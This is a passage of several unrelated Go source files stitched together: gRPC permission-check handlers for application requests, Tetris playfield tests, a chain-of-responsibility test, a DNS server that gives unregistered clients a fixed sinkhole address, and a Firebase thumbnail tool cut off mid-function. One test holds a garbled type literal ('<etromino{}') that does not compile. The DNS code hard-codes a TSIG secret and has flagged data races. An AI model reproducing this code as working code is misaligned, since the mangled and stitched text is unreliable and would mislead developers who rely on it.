		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	_, statusCode, err := plugin.middleware.CheckApplicationPermission(ctx, *query.Name, iam.ProjectView)
	if err != nil {
		return mw.ReturnGRPCErrorResponse(statusCode,
			errors.Wrapf(err, "check application '%s' permission failed", *query.Name))
	}
	return nil
}
// handleAppCreate handle application create
func (plugin *GrpcPlugin) handleAppCreate(ctx context.Context, req *http.Request) *mw.HttpResponse {
	createReq := new(application.ApplicationCreateRequest)
	if err := plugin.readRequestBody(ctx, req, createReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	if statusCode, err := plugin.middleware.CheckCreateApplication(ctx, createReq.Application); err != nil {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check create application failed"))
	}
	// Re-encode the parsed body back onto the request so the proxied call
	// sees a consistent gRPC frame, then fix the length headers.
	newLen, err := plugin.rewriteRequestBody(req, createReq)
	if err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, errors.Wrapf(err, "rewrite request body failed"))
	}
	req.Header.Set("Content-Length", strconv.Itoa(newLen))
	req.ContentLength = int64(newLen)
	return mw.ReturnArgoReverse()
}
// handleAppSync will handle application sync
func (plugin *GrpcPlugin) handleAppSync(ctx context.Context, req *http.Request) *mw.HttpResponse {
	query := &application.ApplicationSyncRequest{}
	if err := plugin.readRequestBody(ctx, req, query); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if query.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *query.Name, iam.ProjectEdit)
}
// handleAppDelete will handle application delete
func (plugin *GrpcPlugin) handleAppDelete(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appDelete := &application.ApplicationDeleteRequest{}
	if err := plugin.readRequestBody(ctx, req, appDelete); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appDelete.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appDelete.Name, iam.ProjectEdit)
}
// handleAppWatch will handle application watch
func (plugin *GrpcPlugin) handleAppWatch(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appWatch := new(application.ApplicationQuery)
	if err := plugin.readRequestBody(ctx, req, appWatch); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appWatch.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appWatch.Name, iam.ProjectEdit)
}
// handleAppUpdate will handle application update
func (plugin *GrpcPlugin) handleAppUpdate(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appUpdate := &application.ApplicationUpdateRequest{}
	if err := plugin.readRequestBody(ctx, req, appUpdate); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Application is an optional proto pointer; guard before dereferencing.
	if appUpdate.Application == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, appUpdate.Application.Name, iam.ProjectEdit)
}
// handleAppUpdateSpec will handle application update spec information
func (plugin *GrpcPlugin) handleAppUpdateSpec(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationUpdateSpecRequest)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppPatch handle application patch
func (plugin *GrpcPlugin) handleAppPatch(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationPatchRequest)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppListResourceEvents handle application list resource events
func (plugin *GrpcPlugin) handleAppListResourceEvents(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationResourceEventsQuery)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppGetApplicationSyncWindows handle application sync windows
func (plugin *GrpcPlugin) handleAppGetApplicationSyncWindows(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationSyncWindowsQuery)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppRevisionMetadata handle application revision metadata
func (plugin *GrpcPlugin) handleAppRevisionMetadata(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.RevisionMetadataQuery)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppGetManifests handle application get manifests
func (plugin *GrpcPlugin) handleAppGetManifests(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationManifestQuery)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppManagedResources handle application managed resources
func (plugin *GrpcPlugin) handleAppManagedResources(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ResourcesQuery)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// ApplicationName is an optional proto pointer; guard before dereferencing.
	if appReq.ApplicationName == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.ApplicationName, iam.ProjectEdit)
}
// handleAppResourceTree handle application resource tree
func (plugin *GrpcPlugin) handleAppResourceTree(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ResourcesQuery)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// ApplicationName is an optional proto pointer; guard before dereferencing.
	if appReq.ApplicationName == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.ApplicationName, iam.ProjectEdit)
}
// handleAppRollback handle application rollback
func (plugin *GrpcPlugin) handleAppRollback(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationRollbackRequest)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppTerminateOperation handle application termination operator
func (plugin *GrpcPlugin) handleAppTerminateOperation(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.OperationTerminateRequest)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppGetResource handle application get resource
func (plugin *GrpcPlugin) handleAppGetResource(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationResourceRequest)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppPatchResource handle application patch resource
func (plugin *GrpcPlugin) handleAppPatchResource(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationResourcePatchRequest)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppListResourceActions handle application list resource actions
func (plugin *GrpcPlugin) handleAppListResourceActions(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationResourceRequest)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppRunResourceAction handle application run resource action
func (plugin *GrpcPlugin) handleAppRunResourceAction(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ResourceActionRunRequest)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppDeleteResource handle application delete resource
func (plugin *GrpcPlugin) handleAppDeleteResource(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationResourceDeleteRequest)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppPodLogs handle application pod logs
func (plugin *GrpcPlugin) handleAppPodLogs(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationPodLogsQuery)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppListLinks handle application list links
func (plugin *GrpcPlugin) handleAppListLinks(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ListAppLinksRequest)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppListResourceLinks handle application list resource links
func (plugin *GrpcPlugin) handleAppListResourceLinks(ctx context.Context, req *http.Request) *mw.HttpResponse {
	appReq := new(application.ApplicationResourceRequest)
	if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; guard before dereferencing.
	if appReq.Name == nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("request application name cannot be empty"))
	}
	return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppCommon handle application common handler
func (plugin *GrpcPlugin) handleAppCommon(ctx context.Context, appName string, actionID iam.ActionID) *mw.HttpResponse {
	if _, statusCode, err := plugin.middleware.CheckApplicationPermission(ctx, appName, actionID); statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode,
			errors.Wrapf(err, "check application '%s' permission failed", appName))
	}
	return nil
}
|
package main
import (
"testing"
"github.com/stretchr/testify/assert"
)
// TestPlayfieldCap verifies the constructor stores the requested dimensions.
func TestPlayfieldCap(t *testing.T) {
	pf := NewPlayfield(16, 10)
	r, c := pf.Cap()
	// assert.Equal takes (t, expected, actual); the original had the
	// arguments swapped, which garbles failure messages.
	assert.Equal(t, 16, r)
	assert.Equal(t, 10, c)
}
// TestPlayfieldSpawn spawns with a selector that always picks index 0 and
// expects the first tetromino type.
func TestPlayfieldSpawn(t *testing.T) {
	field := NewPlayfield(16, 10)
	pickFirst := func(l int) int { return 0 }
	assert.NoError(t, field.Spawn(pickFirst))
	assert.IsType(t, &ITetromino{}, field.current.obj)
}
func TestPlayfieldSpawnUpperBound(t *testing.T) {
pf := NewPlayfield(16, 10)
var ll spawner = func(l int) int {
return l - 1
}
err := pf.Spawn(ll)
assert.NoError(t, err)
assert.IsType(t, <etromino{}, pf.current.obj)
}
// TestPlayfieldSpawnOutOfBounds rejects a selector that returns an index past
// the end and leaves no current piece.
func TestPlayfieldSpawnOutOfBounds(t *testing.T) {
	field := NewPlayfield(16, 10)
	assert.EqualError(t, field.Spawn(func(l int) int { return 100 }), "value out of bounds")
	assert.Nil(t, field.current)
}
// TestPlayfieldSpawnOutOfBoundsNegative rejects a selector that returns a
// negative index and leaves no current piece.
func TestPlayfieldSpawnOutOfBoundsNegative(t *testing.T) {
	field := NewPlayfield(16, 10)
	assert.EqualError(t, field.Spawn(func(l int) int { return -1 }), "value out of bounds")
	assert.Nil(t, field.current)
}
// TestPlayfieldMoveDown moves the freshly spawned piece one row down.
func TestPlayfieldMoveDown(t *testing.T) {
	pf := NewPlayfield(16, 10)
	err := pf.Spawn(func(l int) int { return 0 })
	assert.NoError(t, err)
	// Check the Move error instead of silently discarding it.
	assert.NoError(t, pf.Move(0, 1))
	assert.Equal(t, 1, pf.current.y)
}
// TestPlayfieldMoveDownOutOfBounds verifies an out-of-bounds move is rejected
// and the piece position is left untouched.
func TestPlayfieldMoveDownOutOfBounds(t *testing.T) {
	field := NewPlayfield(16, 10)
	assert.NoError(t, field.Spawn(func(l int) int { return 0 }))
	before := field.current.y
	assert.EqualError(t, field.Move(0, 32), "value out of bounds")
	assert.Equal(t, before, field.current.y)
}
|
package chain
import "testing"
// TestChain wires a teacher -> headmaster chain and pushes several request
// levels through it to exercise each hand-off.
func TestChain(t *testing.T) {
	head := NewTeacher()
	head.SetNext(NewHeadermaster())
	for _, level := range []int{1, 3, 2, 4} {
		head.Exec(level)
	}
}
|
package dns
import (
"flag"
"fmt"
"github.com/miekg/dns"
"net"
"os"
"strconv"
"strings"
"sync"
"time"
)
// IpToDNS caches resolved answers so repeat queries are served locally.
// NOTE(review): addDnsToIp stores IpToDNS[ip] = dnsname, so the map is keyed
// by IP with the DNS name as value — confirm the comment's key direction.
var IpToDNS = make(map[string]string) // key = IP, value = dnsname
// allowed_ips lists client IPs registered via the channel passed to
// StartDNSServer; only these clients get real upstream resolution.
// NOTE(review): read in handleRequest without holding Mutex — data race.
var allowed_ips = make([]string, 0)
// Mutex guards access to IpToDNS.
var Mutex = sync.Mutex{}
// StartDNSServer starts a UDP DNS server on :53 and begins consuming client
// IP registrations from channel. It returns immediately; the server runs in
// a background goroutine.
func StartDNSServer(channel chan string) {
	fmt.Println("Starting DNS Server...")
	server := &dns.Server{Addr: ":53", Net: "udp"}
	server.TsigSecret = map[string]string{"axfr.": "so6ZGir4GPAqINNh9U5c3A=="}
	// Register the handler BEFORE the server starts accepting queries so that
	// early requests are not dropped (the original registered it afterwards).
	dns.HandleFunc(".", handleRequest)
	go checkForKnownIp(channel)
	go func() {
		// Surface listen errors (e.g. :53 already bound) instead of silently
		// discarding them.
		if err := server.ListenAndServe(); err != nil {
			fmt.Fprintf(os.Stderr, "DNS server failed: %v\n", err)
		}
	}()
	fmt.Println("DNS server started!")
}
func checkForKnownIp(channel chan string) {
for {
ip := <-channel
if !contains(allowed_ips, ip) {
fmt.Printf("[%s] REGISTERD NEW CLIENT\n" , ip)
allowed_ips = append(allowed_ips, ip)
}
}
}
// contains reports whether e is present in s.
func contains(s []string, e string) bool {
	for i := range s {
		if s[i] == e {
			return true
		}
	}
	return false
}
// Command-line flags mirroring the miekg/dns example-server options.
// NOTE(review): only compress and tsig-style handling appear in handleRequest;
// cpuprofile, printf, soreuseport and cpu look unused in this chunk.
var (
	cpuprofile = flag.String("cpuprofile", "", "write cpu profile to file")
	printf = flag.Bool("print", false, "print replies")
	compress = flag.Bool("compress", false, "compress replies")
	tsig = flag.String("tsig", "", "use MD5 hmac tsig: keyname:base64")
	soreuseport = flag.Int("soreuseport", 0, "use SO_REUSE_PORT")
	cpu = flag.Int("cpu", 0, "number of cpu to use")
)
// handleRequest answers DNS queries. Registered clients (see checkForKnownIp)
// get real upstream resolution with a per-name cache; everyone else receives
// a fixed sinkhole address (192.168.99.1).
func handleRequest(w dns.ResponseWriter, r *dns.Msg) {
	var (
		v4 bool
		rr dns.RR
		str string
		a net.IP
	)
	m := new(dns.Msg)
	m.SetReply(r)
	m.Compress = *compress
	// Capture the client's port/protocol for the TXT record and whether the
	// client address is IPv4 (v4 drives the A-vs-AAAA choice below).
	if ip, ok := w.RemoteAddr().(*net.UDPAddr); ok {
		str = "Port: " + strconv.Itoa(ip.Port) + " (udp)"
		a = ip.IP
		v4 = a.To4() != nil
	}
	if ip, ok := w.RemoteAddr().(*net.TCPAddr); ok {
		str = "Port: " + strconv.Itoa(ip.Port) + " (tcp)"
		a = ip.IP
		v4 = a.To4() != nil
	}
	// NOTE(review): splitting on ":" breaks for IPv6 source addresses —
	// net.SplitHostPort would be safer; confirm clients are IPv4-only.
	remoteIP := strings.Split(w.RemoteAddr().String(), ":")[0]
	// Default (sinkhole) answer for unregistered clients.
	ip := net.IPv4(192, 168, 99, 1)
	// NOTE(review): allowed_ips is read here without Mutex while
	// checkForKnownIp appends to it — a data race under -race.
	if contains(allowed_ips, remoteIP) {
		foundCachedIp := false
		// Serve from the name cache when a previous lookup stored this name.
		Mutex.Lock()
		for cachedIp, cachedDnsName := range IpToDNS{
			if r.Question[0].Name == cachedDnsName{
				ip = net.ParseIP(cachedIp)
				//fmt.Printf("Found cached IP %s for DNS-Request %s\n", r.Question[0].Name, ip.String())
				foundCachedIp = true
				break
			}
		}
		Mutex.Unlock()
		if !foundCachedIp {
			// Resolve through the host resolver; prefer the first IPv4 hit.
			ips, err := net.LookupIP(r.Question[0].Name)
			if err != nil {
				fmt.Fprintf(os.Stderr, "Could not get IPs: %v\n", err)
				//os.Exit(1)
			}
			ip = nil
			for _, iprunner := range ips {
				if iprunner.To4() != nil {
					ip = iprunner.To4()
					break
				}
			}
			// Fall back to the first result (possibly IPv6) if no IPv4 found.
			if ip == nil && len(ips) > 0 {
				ip = ips[0]
			}
		}
	}
	if ip != nil {
		//fmt.Printf("[%s] DNS-Request: %s | Answer: %s\n", remoteIP, r.Question[0].Name, ip.String())
		// Cache the answer for registered clients (keyed by answer IP).
		for _, allowed_ip := range allowed_ips {
			if allowed_ip == remoteIP {
				addDnsToIp(r.Question[0].Name, ip.String())
			}
		}
	}
	// Build the answer record. NOTE(review): the record type follows the
	// CLIENT's address family (v4), not the resolved address's family —
	// confirm that is intended.
	if v4 {
		rr = &dns.A{
			// Hdr: dns.RR_Header{Name: dom, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: 0},
			Hdr: dns.RR_Header{Name: r.Question[0].Name, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: 0},
			//A: a.To4(),
			A: ip,
		}
	} else {
		rr = &dns.AAAA{
			Hdr: dns.RR_Header{Name: r.Question[0].Name, Rrtype: dns.TypeAAAA, Class: dns.ClassINET, Ttl: 0},
			AAAA: ip,
		}
	}
	// TXT record echoing the client's source port and transport.
	t := &dns.TXT{
		Hdr: dns.RR_Header{Name: r.Question[0].Name, Rrtype: dns.TypeTXT, Class: dns.ClassINET, Ttl: 0},
		Txt: []string{str},
	}
	switch r.Question[0].Qtype {
	case dns.TypeTXT:
		m.Answer = append(m.Answer, t)
		m.Extra = append(m.Extra, rr)
	default:
		// Unhandled query types are answered like A/AAAA queries.
		fallthrough
	case dns.TypeAAAA, dns.TypeA:
		m.Answer = append(m.Answer, rr)
		m.Extra = append(m.Extra, t)
	case dns.TypeAXFR, dns.TypeIXFR:
		// Zone transfer: stream via dns.Transfer and hijack the connection so
		// the WriteMsg at the end of the function is skipped.
		c := make(chan *dns.Envelope)
		tr := new(dns.Transfer)
		defer close(c)
		if err := tr.Out(w, r, c); err != nil {
			return
		}
		//soa, _ := dns.NewRR(`whoami.miek.nl. 0 IN SOA linode.atoom.net. miek.miek.nl. 2009032802 21600 7200 604800 3600`)
		//c <- &dns.Envelope{RR: []dns.RR{soa, t, rr, soa}}
		w.Hijack()
		// w.Close() // Client closes connection
		return
	}
	// Sign the reply when the query carried a valid TSIG record.
	if r.IsTsig() != nil {
		if w.TsigStatus() == nil {
			m.SetTsig(r.Extra[len(r.Extra)-1].(*dns.TSIG).Hdr.Name, dns.HmacMD5, 300, time.Now().Unix())
		} else {
			println("Status", w.TsigStatus().Error())
		}
	}
	w.WriteMsg(m)
}
// addDnsToIp records, under the shared mutex, that ip was the answer most
// recently returned for dnsname.
func addDnsToIp(dnsname string, ip string) {
	Mutex.Lock()
	defer Mutex.Unlock()
	IpToDNS[ip] = dnsname
}
|
package main
import (
"bytes"
"context"
"encoding/json"
"fmt"
"log"
"os"
"strconv"
"strings"
"time"
"cloud.google.com/go/firestore"
cstorage "cloud.google.com/go/storage"
gstorage "cloud.google.com/go/storage"
firebase "firebase.google.com/go"
Auth "firebase.google.com/go/auth"
"firebase.google.com/go/db"
firestorage "firebase.google.com/go/storage"
"github.com/disintegration/imaging"
"github.com/modeckrus/firebase/firebasestorage"
"google.golang.org/api/option"
)
// Package-level Firebase/Google Cloud handles, all wired up in init().
var client *db.Client              // Realtime Database
var fstore *firestore.Client       // Firestore
var storage *firestorage.Client    // Firebase Storage (unused here — TODO confirm)
var bucket *gstorage.BucketHandle  // default Cloud Storage bucket
var auth *Auth.Client              // Firebase Auth
var cstor *cstorage.Client         // raw Cloud Storage client
// init wires up the Firebase app and all derived clients (Realtime
// Database, Firestore, Auth, Cloud Storage) for the "modeckchat"
// project. Any initialisation failure is fatal.
func init() {
	ctx := context.Background()
	conf := &firebase.Config{
		ProjectID:     "modeckchat",
		DatabaseURL:   "https://modeckchat.firebaseio.com/",
		StorageBucket: "modeckchat.appspot.com",
	}
	// Service-account credentials; download the admin SDK key from the
	// Firebase project settings and place it at this path.
	opt := option.WithCredentialsFile("./secured/adminsdk.json")
	app, err := firebase.NewApp(ctx, conf, opt)
	if err != nil {
		log.Fatal(err)
	}
	client, err = app.Database(ctx)
	if err != nil {
		log.Fatal(err)
	}
	fstore, err = app.Firestore(ctx)
	if err != nil {
		log.Fatal(err)
	}
	auth, err = app.Auth(ctx)
	if err != nil {
		log.Fatal(err)
	}
	cstor, err = cstorage.NewClient(ctx, opt)
	if err != nil {
		log.Fatal(err)
	}
	bucket = cstor.Bucket("modeckchat.appspot.com")
}
// ThubHand mirrors a thumbnail-request document stored in Firestore
// (path of the source image plus the sizes to generate).
// NOTE(review): Height is declared string while Width is int — likely an
// inconsistency in the stored document schema; confirm against Firestore
// data before changing either type.
type ThubHand struct {
	Path  string `json:"path"`
	Sizes []struct {
		Height string `json:"height"`
		Width  int    `json:"width"`
	} `json:"sizes"`
}
// main generates a fixed set of square thumbnails for a test image in
// the configured storage bucket.
func main() {
	fmt.Println(os.Getenv("GOOGLE_CLOUD_PROJECT"))
	// Thumbnail sizes to generate, kept in the original order.
	// (Replaces the verbose var-then-assign form with one idiomatic
	// composite literal; element types are implied by the slice type.)
	sizes := []Size{
		{Width: 100, Height: 100},
		{Width: 200, Height: 200},
		{Width: 300, Height: 300},
		{Width: 500, Height: 500},
		{Width: 50, Height: 50},
		{Width: 20, Height: 20},
	}
	Thubnails(cstor, bucket, "test/avatar.jpg", sizes)
}
/*
ctx := context.Background()
doc := fstore.Collection("service").Doc("service").Collection("thubnail").Doc("x9f09yczE0fGiNyehsul")
snap, err := doc.Get(ctx)
if err != nil {
log.Fatal(err)
}
var thub ThubHand
err = snap.DataTo(&thub)
if err != nil {
log.Fatal(err)
}
fstore.Collection("service").Doc("service").Collection("thubnail").Add(ctx, thub)
fmt.Println(thub)
b, err := firebasestorage.Read(cstor, bucket, "david.jpg")
io := bytes.NewReader(b)
src, err := imaging.Decode(io)
err = imaging.Save(src, "images/david.jpg")
if err != nil {
log.Fatal(err)
}
*/
/*
var sizes [] Size
sizes = [] Size{
Size{
Width: 100,
Height: 100,
},
Size{
Width: 200,
Height: 200,
},
Size{
Width: 300,
Height: 300,
},
Size{
Width: 500,
Height: 500,
},
}
thub := Thubnail{
Path: "avatars/testavatar/download.jpeg",
Sizes: sizes,
Ready: false,
}
js, err := json.Marshal(thub)
if err != nil {
log.Fatal(err)
}
fmt.Println(string(js))
ctx := context.Background()
fstore.Collection("service").Doc("service").Collection("thubnail").Add(ctx, thub)
*/
// Size describes a thumbnail's pixel dimensions.
type Size struct {
	Width  int // width in pixels
	Height int // height in pixels
}
// FirestoreEvent is the payload of a Firestore event delivered to a
// Cloud Function: the document before and after the change, plus the
// list of changed field paths.
type FirestoreEvent struct {
	OldValue   FirestoreValue `json:"oldValue"`
	Value      FirestoreValue `json:"value"`
	UpdateMask struct {
		FieldPaths []string `json:"fieldPaths"`
	} `json:"updateMask"`
}
// FirestoreValue holds one Firestore document revision: its fields (in
// the raw typed-wrapper format Firestore events use), full resource
// name, and timestamps.
type FirestoreValue struct {
	CreateTime time.Time `json:"createTime"`
	// Fields is the data for this value. The type depends on the format of your
	// database. Log an interface{} value and inspect the result to see a JSON
	// representation of your database fields.
	Fields     ThubHandStruct `json:"fields"`
	Name       string         `json:"name"`
	UpdateTime time.Time      `json:"updateTime"`
}
// ThubHandStruct is the raw Firestore-event encoding of a thumbnail
// request: every scalar is wrapped in a typed-value struct, and integers
// arrive as strings (converted in convertToThubStrcut).
type ThubHandStruct struct {
	Path struct {
		StringValue string `json:"stringValue"`
	} `json:"Path"`
	Ready struct {
		BooleanValue bool `json:"booleanValue"`
	} `json:"Ready"`
	Sizes struct {
		ArrayValue struct {
			Values []struct {
				MapValue struct {
					Fields struct {
						Height struct {
							IntegerValue string `json:"integerValue"`
						} `json:"Height"`
						Width struct {
							IntegerValue string `json:"integerValue"`
						} `json:"Width"`
					} `json:"fields"`
				} `json:"mapValue"`
			} `json:"values"`
		} `json:"arrayValue"`
	} `json:"Sizes"`
}
// Thubnail is the flattened Firestore representation of a thumbnail
// request: source path, requested sizes, and whether generation is done.
type Thubnail struct {
	Path  string `json:"path"`
	Sizes []Size `json:"sizes"`
	Ready bool   `json:"ready"`
}
// convertToThubStrcut flattens the raw Firestore event fields into a
// Thubnail, parsing the string-encoded integer dimensions. Ready is
// always false in the result; the handler sets it after processing.
func convertToThubStrcut(hand ThubHandStruct) (Thubnail, error) {
	out := Thubnail{Path: hand.Path.StringValue}
	for _, v := range hand.Sizes.ArrayValue.Values {
		fields := v.MapValue.Fields
		height, err := strconv.Atoi(fields.Height.IntegerValue)
		if err != nil {
			return out, err
		}
